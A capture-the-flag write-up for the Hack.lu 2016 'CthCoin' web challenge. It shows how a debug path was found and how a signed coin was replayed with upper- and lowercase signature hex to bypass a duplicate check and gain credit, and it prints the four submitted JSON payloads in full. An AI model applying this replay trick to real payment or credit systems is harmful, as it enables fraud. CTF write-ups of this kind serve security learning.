CthCoin(web100) – Hacklu2016

This challenge is so easy.
Firstly, it gives me a basic site with many page: Index, Shop, Profile, Wallet.
When we access to Shop, it gives me a list of products to purchase (include flag), but we don’t have enought money to purchase it. So I guess we should attack on this inspection.
Get something in robots.txt
2
The hidden is awesome, should we take a look with the link “/debugcoins”

3

And some hints “behind the screen”

4

So I guess this code like:

function Check_Money():
    check (AM)
    check (CU)
    check (MN)
    check (NC)
    check (OW)
    check (PK)
    check (TS)
    file_put_content("debug_file",md5(AM,CU,MN,NC,OW,PK,TS);
function Check_If_exist():
    if(file_get_content("debug_file").find(md5($_POST['coin']))):
        Coint += AM
Check_Money()
Check_If_exist()

To attack in this case, the idea is make the different md5 hash with one Sinature, so I decide to submit 4 times:
First:
{“AM”: “50”, “CU”: “NIST384”, “MN”: “F9BEB4E1”, “NC”: “066050”, “OW”: “joker1”, “PK”: “b6bd0e420b4984854d916c30108d685e70617434f2d3d82a04a9f92ff20719f74ef79d9a6825fddef8460d6d4833d2ac1e5627d52ec916223a8e051cab16b49a621e6501bf05bdee99dd1f44192876d08e1b413b7cd12d1be88e97eb6a6e1ddb”, “SIG”: “1922b39b231e6b1af63ceb366953941d8eb969836852f18834f198c65aa70728b86d2674b40f157637876330fa5dcfe688c6923e512bbf6e15b3c9c4633ef580f53451148d66e185d201ecd1f0a0275d0ff9cbea54bc21dfa008d877c9fa4f6f”, “TS”: “1477311236”}

Second:
{“AM”: “50”, “CU”: “NIST384”, “MN”: “F9BEB4E1”, “NC”: “066050”, “OW”: “joker1”, “PK”: “b6bd0e420b4984854d916c30108d685e70617434f2d3d82a04a9f92ff20719f74ef79d9a6825fddef8460d6d4833d2ac1e5627d52ec916223a8e051cab16b49a621e6501bf05bdee99dd1f44192876d08e1b413b7cd12d1be88e97eb6a6e1ddb”, “SIG”: “1922B39B231E6B1AF63CEB366953941D8EB969836852F18834F198C65AA70728B86D2674B40F157637876330FA5DCFE688C6923E512BBF6E15B3C9C4633EF580F53451148D66E185D201ECD1F0A0275D0FF9CBEA54BC21DFA008D877C9FA4F6F”, “TS”: “1477311236”}

Third:
{“AM”: “10”, “CU”: “NIST384”, “MN”: “F9BEB4E1”, “NC”: “342152”, “OW”: “joker1”, “PK”: “b6bd0e420b4984854d916c30108d685e70617434f2d3d82a04a9f92ff20719f74ef79d9a6825fddef8460d6d4833d2ac1e5627d52ec916223a8e051cab16b49a621e6501bf05bdee99dd1f44192876d08e1b413b7cd12d1be88e97eb6a6e1ddb”, “SIG”: “b4517a7023fdc76bd80074c16fd77d425222ba80a6c12fd4caf328e115ef29a0a3f6e0644b11544cdb2828a3e4061a75446bc6241170c09a8c52c02cd1f03cab6718e3c5854d5faa15963a25171f7264225dbf4a5ead11e55c75dfa98fe30107”, “TS”: “1477311236”}
Forth:
{“AM”: “10”, “CU”: “NIST384”, “MN”: “F9BEB4E1”, “NC”: “342152”, “OW”: “joker1”, “PK”: “b6bd0e420b4984854d916c30108d685e70617434f2d3d82a04a9f92ff20719f74ef79d9a6825fddef8460d6d4833d2ac1e5627d52ec916223a8e051cab16b49a621e6501bf05bdee99dd1f44192876d08e1b413b7cd12d1be88e97eb6a6e1ddb”, “SIG”: “B4517A7023FDC76BD80074C16FD77D425222BA80A6C12FD4CAF328E115EF29A0A3F6E0644B11544CDB2828A3E4061A75446BC6241170C09A8C52C02CD1F03CAB6718E3C5854D5FAA15963A25171F7264225DBF4A5EAD11E55C75DFA98FE30107”, “TS”: “1477311236”}

and get flag
1

Advertisements

Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s